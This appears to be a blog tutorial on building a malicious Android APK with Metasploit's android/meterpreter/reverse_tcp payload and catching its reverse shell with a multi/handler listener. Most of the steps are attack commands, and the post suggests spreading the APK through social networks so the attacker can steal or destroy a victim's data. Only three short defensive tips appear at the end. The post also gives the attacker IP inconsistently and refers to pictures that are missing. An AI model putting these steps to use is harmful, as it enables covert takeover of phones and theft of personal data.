if you don't know actually what is android simply see bellow Wikipedia article about android
What Is Android? According To WikiPedia:Android is an operating system based on the Linux kernel, and designed primarily for touchscreen mobile devices such as smartphones and tablet computers. Initially developed by Android, Inc., which Google backed financially and later bought in 2005, Android was unveiled in 2007 along with the founding of the Open Handset Alliance: a consortium of hardware, software, and telecommunication companies devoted to advancing open standards for mobile devices.
According To WikiPedia: What Is .APK?Android application package file (APK) is the file format used to distribute and install application software and middleware onto Google's Android operating system; very similar to an MSI package in Windows or a Deb package in Debian-based operating systems like Ubuntu.
Start now today's tutorial:
Before going to start this aticle you put some thing keep in mind , Here is some initial information for this tutorial:
1) Attacker IP address: 192.168.8.94
2) Attacker port to receive connection: 443
What Is Your Requirements:1. First you need Metasploit framework (we use Kali Linux 1.0.6 in this tutorial)
2. Obiously you need a Android smartphone (we use LG android 4.4 KitKat)
Step by Step Hacking Android Smartphone Tutorial using Metasploit:Step:1) First of all simply Open terminal if you don't know how simply press CTRL + ALT + T
Step:2) After that We will utilize Metasploit payload framework to create exploit for this tutorial.
msfpayload android/meterpreter/reverse_tcp LHOST=<attacker_ip_address> LPORT=<port_to_receive_connection>
Here we allready describe what is attacker IP address and here we considered ip as 18.104.22.168, if you don't understand please see beelow picture
Step:3) This is Because our payload is reverse_tcp where attacker expect the victim to connect back to attacker machine, attacker needs to set up the handler to handle incoming connections to the port already specified above.simply goto console if you don't know how to go to consol window simply Type msfconsole to go to Metasploit console.
use exploit/multi/handler –> we will use Metasploit handler
set payload android/meterpreter/reverse_tcp –> make sure the payload is the same with step 2
step:4) After doing this The next step we need to configure the switch for the Metasploit payload we already specified in step 3.
Info:Step:5) Attacker already have the APK's file and now he will start distribute it (I don't need to describe how to distribute this file, internet and social networking sites are the good place for distribution )
set lhost 192.168.8.94 –> attacker IP address
set lport 443 –> port to listen the reverse connection
exploit –> start to listen incoming connection
Step:6) Short stories the victim (me myself) download the malicious APK's file and install it. After victim open the application, attacker Metasploit console get something like this:
Step:7) What its mean , It's mean that attacker already inside the victim android smartphone and he can do everything with victim phone he can steal all information of victim even sometime destroy all sencitive data of mobile.
- 1. Don't install APK's from the unknown source.
- 2. If you really want to install APK's from unknown source, make sure you can view, read and examine the source code. The picture below is the source code of our malicious APK's in this tutorial.
- 3.always turn of unknown source installation feature ,every phone have this feature in security tab under mobile setting
Share this article if you found this post was useful